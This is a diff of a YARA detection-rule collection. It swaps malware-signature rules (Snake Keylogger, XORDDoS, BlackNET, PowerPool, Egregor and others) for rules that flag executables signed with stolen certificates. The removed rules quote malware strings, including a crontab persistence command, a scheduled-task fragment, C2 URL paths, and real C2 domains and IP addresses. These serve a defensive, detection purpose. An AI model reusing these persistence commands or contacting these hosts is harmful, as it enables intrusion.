-		$s10 = "{0}processlist.txt" fullword wide
-		$s11 = "{0}Browsers\\Passwords.txt" fullword wide
+		thumbprint = "e339c8069126aa6313484fea85b4b326f7b8860c"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 7 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Germany classer software" and pe.signatures [ i ] . serial == "01" )
 }
-rule DITEKSHEN_MALWARE_Win_Snakekeylogger : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_734D0Baf7A6B44743Ff852C8Ba7A751A7Ff0Ec73 : FILE
 {
 	meta:
-		description = "Detects Snake Keylogger"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "e44bf33c-916d-5dc3-ba2a-89e13f1511a2"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "1dc06f6e-2152-516a-b9cc-0d95c098c88f"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2178-L2207"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6031-L6042"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7d787026b290c3c6a43c7de83233f22980733e7401260ff2f763e6f1b534ecba"
+		logic_hash = "54620c58bae2c2f9859916a58b0fef4310dd27fdada663c28bb7d58bdaefc7c5"
 		score = 75
-		quality = 42
+		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.SnakeKeylogger"
-
-	strings:
-		$id1 = "SNAKE-KEYLOGGER" fullword ascii
-		$id2 = "----------------S--------N--------A--------K--------E----------------" ascii
-		$s1 = "_KPPlogS" fullword ascii
-		$s2 = "_Scrlogtimerrr" fullword ascii
-		$s3 = "_Clpreptimerr" fullword ascii
-		$s4 = "_clprEPs" fullword ascii
-		$s5 = "_kLLTIm" fullword ascii
-		$s6 = "_TPSSends" fullword ascii
-		$s7 = "_ProHfutimer" fullword ascii
-		$s8 = "GrabbedClp" fullword ascii
-		$s9 = "StartKeylogger" fullword ascii
-		$x1 = "$%SMTPDV$" wide
-		$x2 = "$#TheHashHere%&" wide
-		$x3 = "%FTPDV$" wide
-		$x4 = "$%TelegramDv$" wide
-		$x5 = "KeyLoggerEventArgs" ascii
-		$m1 = "| Snake Keylogger" ascii wide
-		$m2 = /(Screenshot|Clipboard|keystroke) Logs ID/ ascii wide
-		$m3 = "SnakePW" ascii wide
-		$m4 = "\\SnakeKeylogger\\" ascii wide
+		thumbprint = "734d0baf7a6b44743ff852c8ba7a751a7ff0ec73"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and ( all of ( $id* ) or 6 of ( $s* ) or ( 1 of ( $id* ) and 3 of ( $s* ) ) or 4 of ( $x* ) ) ) or ( 2 of ( $m* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Transition software (C) 2018" and pe.signatures [ i ] . serial == "01" )
 }
-rule DITEKSHEN_MALWARE_Linux_Xorddos : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_02Fa994D660De659Ee9037Ecb437D766 : FILE
 {
 	meta:
-		description = "Detects XORDDoS"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "0ca581c3-bce2-5b4f-8146-9aeb49b88813"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "cb2aa5d6-913e-5d74-a903-1cb88fb63b1c"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2209-L2220"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6044-L6056"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "192378d903316c1d80b064e78feb6ed9d2ffc9e6c7dc0c8df223d83d17e4e8d9"
+		hash = "0868a2a7b5e276d3a4a40cdef994de934d33d62a689d7207a31fd57d012ef948"
+		logic_hash = "04244701311fcdc77b1e3a8f20621e474ed607be3d109c629280d528e2f24e1f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done" fullword ascii
-		$s2 = "cp /lib/libudev.so /lib/libudev.so.6" fullword ascii
-		$s3 = "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab" fullword ascii
-		$s4 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)" fullword ascii
+		thumbprint = "0cb6bde041b58dbd4ec64bd5a3be38c50f17bb3d"
+		importance = 20
 
 	condition:
-		uint32( 0 ) == 0x464c457f and 3 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Piriform Software Ltd" and pe.signatures [ i ] . serial == "02:fa:99:4d:66:0d:e6:59:ee:90:37:ec:b4:37:d7:66" )
 }
-rule DITEKSHEN_MALWARE_Win_Blacknet : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0B446546C36525Bf5F084F6Bbbba7097 : FILE
 {
 	meta:
-		description = "Detects BlackNET RAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "c1ece46a-3cd9-54aa-a105-1c5b19357a7e"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "608a410d-d34f-5eea-92db-3d156d01d360"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2222-L2250"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6058-L6071"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "64e00325a5a6a595067c6133800e73d943f45e2783475c24ed4a9bd9937fe0d6"
+		hash = "3163ffc06848f6c48ac460ab844470ef85a07b847bf187c2c9cb26c14032a1a5"
+		logic_hash = "6dcf87b929c28cc013ee5c9de85aa026e335e1e5c38a440bc6b5dc11c6bf9a91"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		snort2_sid = "920079-920082"
-		snort3_sid = "920079-920082"
-		clamav_sig = "MALWARE.Win.Trojan.BlackNET"
-
-	strings:
-		$s1 = "SbieCtrl" fullword wide
-		$s2 = "SpyTheSpy" fullword wide
-		$s3 = "\\BlackNET.dat" fullword wide
-		$s4 = "StartDDOS" fullword wide
-		$s5 = "UDPAttack" fullword wide
-		$s6 = "ARMEAttack" fullword wide
-		$s7 = "TCPAttack" fullword wide
-		$s8 = "HTTPGetAttack" fullword wide
-		$s9 = "RetriveLogs" fullword wide
-		$s10 = "StealPassword" fullword wide
-		$s11 = "/create /f /sc ONSTART /RL HIGHEST /tn \"'" fullword wide
-		$b1 = "DeleteScript|BN|" fullword wide
-		$b2 = "|BN|Online" fullword wide
-		$b3 = "NewLog|BN|" fullword wide
-		$cnc1 = "/getCommand.php?id=" fullword wide
-		$cnc2 = "/upload.php?id=" fullword wide
-		$cnc3 = "connection.php?data=" fullword wide
-		$cnc4 = "/receive.php?command=" fullword wide
+		thumbprint = "05cdf79b0effff361dac0363adaa75b066c49de0"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 9 of ( $s* ) or all of ( $cnc* ) or all of ( $b* ) or 12 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TeamViewer Germany GmbH" and pe.signatures [ i ] . serial == "0b:44:65:46:c3:65:25:bf:5f:08:4f:6b:bb:ba:70:97" and 1608724800 <= pe.signatures [ i ] . not_after )
 }
-rule DITEKSHEN_MALWARE_Win_Stormkitty : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00E4E795Fd1Fd25595B869Ce22Aa7Dc49F : FILE
 {
 	meta:
-		description = "Detects StormKitty infostealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "a061a1c0-9ed5-5048-85df-4d7ed6995e92"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "8807c05d-c13b-58e8-9dda-c2eae6b5979c"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2252-L2269"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6087-L6101"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5d139aad6932f177cd14e0356f822ad68ddc659ea4fabd2fd2fbcbc8bad58888"
+		logic_hash = "0aef5e2af3059597d218c544bc0b56078e1ef924af0530c62aa12679e0816410"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.StormKitty"
-
-	strings:
-		$x1 = "\\ARTIKA\\Videos\\Chrome-Password-Recovery" ascii
-		$x2 = "https://github.com/LimerBoy/StormKitty" fullword ascii
-		$x3 = "StormKitty" fullword ascii
-		$s1 = "GetBSSID" fullword ascii
-		$s2 = "GetAntivirus" fullword ascii
-		$s3 = "C:\\Users\\Public\\credentials.txt" fullword wide
-		$s4 = "^([a-zA-Z0-9_\\-\\.]+)@([a-zA-Z0-9_\\-\\.]+)\\.([a-zA-Z]{2,5})$" fullword wide
-		$s5 = "BCrypt.BCryptGetProperty() (get size) failed with status code:{0}" fullword wide
-		$s6 = "\"encrypted_key\":\"(.*?)\"" fullword wide
+		thumbprint = "269f25e6b7c690ae094086bd7825d03b48d4fcb1"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or 5 of ( $s* ) or ( 3 of ( $s* ) and 1 of ( $x* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OASIS COURT LIMITED" and ( pe.signatures [ i ] . serial == "00:e4:e7:95:fd:1f:d2:55:95:b8:69:ce:22:aa:7d:c4:9f" or pe.signatures [ i ] . serial == "e4:e7:95:fd:1f:d2:55:95:b8:69:ce:22:aa:7d:c4:9f" ) )
 }
 
-rule DITEKSHEN_MALWARE_Win_Bulz01 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_008E0Fa6B464D466Df1B267504B04F7B27 : FILE
 {
 	meta:
-		description = "Detects trojan loader"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "4ac4125b-70f5-5cda-ae45-fd5713e25a6e"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "6de3aab7-7175-537b-8a33-56cb0662b7a6"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2271-L2281"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6103-L6114"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "29884dda4936016660f5d1e33ffcf97a20c7d3116483a5895a5e2a1dd4ac9e9f"
+		logic_hash = "1f992d81b63108840d457f3f1906524cf4a9d4bec4a91f7bc826fae9989d40e0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "DisableTrivet.dll" fullword ascii
+		thumbprint = "91707c95044c5badcd51d198bdbe3a7ff3156c35"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and all of ( $s* ) and ( pe.exports ( "Ordinal" ) or pe.exports ( "Chechako" ) or pe.exports ( "Originator" ) or pe.exports ( "Repressions" ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ApcWCjFsGXwbWUJrKZ" and pe.signatures [ i ] . serial == "00:8e:0f:a6:b4:64:d4:66:df:1b:26:75:04:b0:4f:7b:27" )
 }
-rule DITEKSHEN_MALWARE_Win_Revcoderat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_559Cb90Fd16E9D1Ad375F050Ab6A6616 : FILE
 {
 	meta:
-		description = "Detects RevCode/WebMonitor RAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "4acf6742-7f5c-5126-89cc-b39b1acd922e"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "8b2ed295-5aae-5ced-9603-8125b4e261f9"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2283-L2332"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6116-L6127"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e5bf1ce79b7955f597df1a9e361a3be892de55cd3db767278d4ccc02ace9e9f5"
+		logic_hash = "a91f23e2281efb95b780b26018f1c89485a87c6541ac84025dad3e6dd55c742e"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
-		snort2_sid = "920070"
-		snort3_sid = "920070"
-		clamav_sig = "MALWARE.Win.Trojan.RevCodeRAT"
-
-	strings:
-		$x1 = "rev-novm.dat" fullword wide
-		$x2 = "WebMonitor-" fullword wide
-		$x3 = "WebMonitor Client" fullword wide
-		$x4 = "Launch WebMonitor" fullword wide
-		$s1 = "KEYLOG_DEL" fullword ascii
-		$s2 = "KEYLOG_STREAM_START" fullword ascii
-		$s3 = "send_keylog_del" fullword ascii
-		$s4 = "send_keylog_stream_" ascii
-		$s5 = "send_shell_exec" fullword ascii
-		$s6 = "send_file_download_exec" fullword ascii
-		$s7 = "send_pdg_exec" fullword ascii
-		$s8 = "send_app_cmd_upd" fullword ascii
-		$s9 = "send_webcamstream_start" fullword ascii
-		$s10 = "send_screenstream_start" fullword ascii
-		$s11 = "send_clipboard_get" fullword ascii
-		$s12 = "send_pdg_rev_proxy_stop" fullword ascii
-		$s13 = "send_shell_stop" fullword ascii
-		$s14 = "send_wnd_cmd" fullword ascii
-		$s15 = "SCREEN_STREAM_LEGACY(): Started..." fullword ascii
-		$s16 = "SYSTEM_INFORMATION(): Failed! (Error:" fullword ascii
-		$s17 = "TARGET_HOST_UPDATE(): Sync successful!" fullword ascii
-		$s18 = "PLUGIN_PROCESS_REVERSE_PROXY: Plugin" ascii
-		$s19 = "PLUGIN_PROCESS: Plugin" ascii
-		$s20 = "PLUGIN_EXEC: Plugin" ascii
-		$s21 = "PLUGIN_PROCESS_SCREEN_STREAM: Plugin" ascii
-		$cnc1 = "?task_id=" fullword ascii
-		$cnc2 = "&operation=" fullword ascii
-		$cnc3 = "&filesize=" fullword ascii
-		$cnc4 = "pos=" fullword ascii
-		$cnc5 = "&mode=" fullword ascii
-		$cnc6 = "&cmp=1" fullword ascii
-		$cnc7 = "&cmp=0" fullword ascii
-		$cnc8 = "&enc=1" fullword ascii
-		$cnc9 = "&enc=0" fullword ascii
-		$cnc10 = "&user=" fullword ascii
-		$cnc11 = "&uid=" fullword ascii
-		$cnc12 = "&key=" fullword ascii
+		thumbprint = "78a149f9a04653b01df09743571df938f9873fa5"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $x* ) or all of ( $cnc* ) or 8 of ( $s* ) or ( 1 of ( $x* ) and 6 of ( $s* ) ) or ( 6 of ( $cnc* ) and 6 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Shenzhen Smartspace Software technology Co.,Limited" and pe.signatures [ i ] . serial == "55:9c:b9:0f:d1:6e:9d:1a:d3:75:f0:50:ab:6a:66:16" )
 }
-rule DITEKSHEN_MALWARE_Win_Powerpool_STG1 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_Eb95A7Bd7553533D : FILE
 {
 	meta:
-		description = "Detects first stage PowerPool backdoor"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "8531c22d-8d71-5794-b9c8-0a4cd81bb2b0"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "b9198469-4eba-552d-a8f5-5841893ff85e"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2334-L2361"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6159-L6170"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9ab00d6e3007743a8bb30fbcdb435ac49101b52face55549ae454c64345caff9"
+		logic_hash = "e646346d94791c2a86a7240d4cf1f9138a30ca583b021ae5b17471cef20a98de"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		snort2_sid = "920088"
-		snort3_sid = "920086"
-		clamav_sig = "MALWARE.Win.Trojan.PowerPool-STG-1"
-
-	strings:
-		$s1 = "cmd /c powershell.exe $PSVersionTable.PSVersion > \"%s\"" fullword wide
-		$s2 = "cmd /c powershell.exe \"%s\" > \"%s\"" fullword wide
-		$s3 = "rar.exe a -r %s.rar -ta%04d%02d%02d%02d%02d%02d -tb%04d%02d%02d%02d%02d%02d" fullword wide
-		$s4 = "MyDemonMutex%d" fullword wide
-		$s5 = "MyScreen.jpg" fullword wide
-		$s6 = "proxy.log" fullword wide
-		$s7 = "myjt.exe" fullword wide
-		$s8 = "/?id=%s&info=%s" fullword wide
-		$s9 = "auto.cfg" fullword ascii
-		$s10 = "Mozilla/5.0 (Windows NT 6.1; WOW64)" fullword wide
-		$s11 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)" fullword wide
-		$s12 = "CMD COMMAND EXCUTE ERROR!" fullword ascii
-		$c1 = "run.afishaonline.eu" fullword wide
-		$c2 = "home.Sports-Collectors.com" fullword wide
-		$c3 = "about.Sports-Collectors.com" fullword
-		$c4 = "179.43.158.15" fullword wide
-		$c5 = "185.227.82.35" fullword wide
+		thumbprint = "8d658fd671fa097c3db18906a29e8c1fa45113d9"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or ( 1 of ( $c* ) and 5 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\x02C\\x02\\x97\\x04\\x17\\x04\\x1e\\x04.\\x02\\x90\\x00g\\x02\\x94\\x02\\xae\\x00p\\x04 \\x00K\\x04J\\x02\\x88\\x042\\x02K\\x02\\xa3" and pe.signatures [ i ] . serial == "eb:95:a7:bd:75:53:53:3d" )
 }
-rule DITEKSHEN_MALWARE_Win_Powerpool_STG2 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0A1F3A057A1Dce4Bf7D76D0C7Adf837E : FILE
 {
 	meta:
-		description = "Detects second stage PowerPool backdoor"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "1a059900-3292-5419-a143-caea3e710191"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "c4829ec0-b6be-5701-a4cf-e4b1205240b3"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2363-L2395"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6172-L6184"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b80712bab281dbde816e2eda6ab1b4a9e21be26578fb755a1e1e1635675aa911"
+		hash = "2df05a70d3ce646285a0f888df15064b4e73034b67e06d9a4f4da680ed62e926"
+		logic_hash = "de9ae66e497730db54fc21a745426c687c3a4d9819c08bc1dca0b42a5b8070ac"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		snort2_sid = "920089-920091"
-		snort3_sid = "920087-920089"
-		clamav_sig = "MALWARE.Win.Trojan.PowerPool-STG-2"
-
-	strings:
-		$s1 = "write info fail!!! GetLastError-->%u" fullword ascii
-		$s2 = "LookupAccountSid Error %u" fullword ascii
-		$s3 = "Mozilla/4.0 (compatible; )" fullword ascii
-		$s4 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)" fullword ascii
-		$s5 = "Content-Disposition: form-data; name=\"%s\"" fullword ascii
-		$s6 = "Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"" fullword ascii
-		$s7 = "Content-Type: multipart/form-data; boundary=--MULTI-PARTS-FORM-DATA-BOUNDARY" fullword ascii
-		$s8 = "in Json::Value::find" fullword ascii
-		$s9 = "in Json::Value::resolveReference" fullword ascii
-		$s10 = "in Json::Value::duplicateAndPrefixStringValue" fullword ascii
-		$s11 = ".?AVLogicError@Json@@" fullword ascii
-		$s12 = ".?AVRuntimeError@Json@@" fullword ascii
-		$s13 = "http:\\\\82.221.101.157:80" ascii
-		$s14 = "http://172.223.112.130:80" ascii
-		$s15 = "http://172.223.112.130:443" ascii
-		$s16 = "http://info.newsrental.net:80" ascii
-		$s17 = "%s|%I64d" ascii
-		$s18 = "open internet failed..." ascii
-		$s19 = "connect failed..." ascii
-		$s20 = "handle not opened..." ascii
-		$s21 = "corrupted regex pattern" fullword ascii
-		$s22 = "add cookie failed..." ascii
+		thumbprint = "8279b87c89507bc6e209a7bd8b5c24b31fb9a6dc"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 14 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing Qihu Technology Co., Ltd." and pe.signatures [ i ] . serial == "0a:1f:3a:05:7a:1d:ce:4b:f7:d7:6d:0c:7a:df:83:7e" )
 }
 
-rule DITEKSHEN_MALWARE_Win_Egregor : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00849Ea0945Dd2Ea2Dc3Cc2486578A5715 : FILE
 {
 	meta:
-		description = "Detects Egregor ransomware variants"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "2e24d4ec-39c2-5148-80a1-04f96bc8b477"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "8584af2e-6b1e-5141-abbf-84e414ffaead"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2397-L2434"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6186-L6197"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d39a7bf89a7574f7dfe56db78c8cdbbee97782f829805d4ee87fd9f1635154cd"
+		logic_hash = "824744510e73cd6717e3626a5a250466bfb5817fd7172fc32466c2e68e20947b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Ransomware.Egregor"
-
-	strings:
-		$s1 = "C:\\Logmein\\{888-8888-9999}\\Logmein.log" fullword wide
-		$p1 = "--deinstall" fullword wide
-		$p2 = "--del" fullword wide
-		$p3 = "--exit" fullword wide
-		$p4 = "--kill" fullword wide
-		$p5 = "--loud" fullword wide
-		$p6 = "--nooperation" fullword wide
-		$p7 = "--nop" fullword wide
-		$p8 = "--skip" fullword wide
-		$p9 = "--useless" fullword wide
-		$p10 = "--yourmommy" fullword wide
-		$p11 = "-passegregor" ascii wide
-		$p12 = "-peguard" ascii wide
-		$p13 = "--nomimikatz" ascii wide
-		$p14 = "--multiproc" ascii wide
-		$p15 = "--killrdp" ascii wide
-		$p16 = "--nonet" ascii wide
-		$p17 = "--norename" ascii wide
-		$p18 = "--greetings" ascii wide
+		thumbprint = "8c56adfb8fba825aa9a4ab450c71d45b950e55a4"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and ( ( all of ( $s* ) and 1 of ( $p* ) ) or ( 2 of them and filesize < 1000KB and for any i in ( 0 .. pe.number_of_sections ) : ( ( pe.sections [ i ] . name == ".00cfg" ) ) ) ) ) or 8 of ( $p* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Biglin" and pe.signatures [ i ] . serial == "00:84:9e:a0:94:5d:d2:ea:2d:c3:cc:24:86:57:8a:57:15" )
 }
 
-rule DITEKSHEN_MALWARE_Win_Redlinedropperexe : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0537F25A88E24Cafdd7919Fa301E8146 : FILE
 {
 	meta:
-		description = "Detects executables dropping RedLine infostealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "364ba540-60a5-5e1b-bb21-505a442eabb6"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "b0dd33b4-2040-5021-bebc-5ca26d75f14c"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2461-L2484"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6215-L6227"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cd1fb4a1d0883221dbdcc519db7f54b0f7285e8a19201dbc586c2520e8086bc2"
+		hash = "72ac61e6311f2a6430d005052dbc0cc58587e7b75722b5e34a71081370f4ddd5"
+		logic_hash = "8cd68612354a756c4a52d6baea9ef6ed74c94f5fcf25baa2f72c1131e0828f84"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.RedLineDropper-EXE"
-
-	strings:
-		$s1 = "Wizutezinod togeto0Rowadufevomuki futenujilazem jic lefogatenezinor" fullword wide
-		$s2 = "6Tatafamobevofaj bizafoju peyovavacoco lizine kezakajuj" fullword wide
-		$s3 = "Lawuherusozeru kucu zam0Zorizeyuk lepaposupu gala kinarusot ruvasaxehuwo" fullword wide
-		$s4 = "ClearEventLogW" fullword ascii
-		$s5 = "ProductionVersion" fullword wide
-		$s6 = "Vasuko)Yugenizugilobo toxocivoriye yexozoyohuzeb" wide
-		$s7 = "Yikezevavuzus gucajanesan#Rolapucededoxu xewulep fuwehofiwifi" wide
+		thumbprint = "922211f5ab4521941d26915aeb82ee728f931082"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( pe.exports ( "_fgeek@8" ) and 2 of them ) or ( 2 of them and for any i in ( 0 .. pe.number_of_sections ) : ( ( pe.sections [ i ] . name == ".rig" ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Avira Operations GmbH & Co. KG" and pe.signatures [ i ] . serial == "05:37:f2:5a:88:e2:4c:af:dd:79:19:fa:30:1e:81:46" )
 }
-rule DITEKSHEN_MALWARE_Win_Nibiru : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_2E4A279Bde2Eb688E8Ab30F5904Fa875 : FILE
 {
 	meta:
-		description = "Detects Nibiru ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "78c3bf75-1ab3-5f88-ba4b-d5a0a906d57c"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "3fd40418-9efe-5dfe-a4e2-01ff9c46a4d5"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
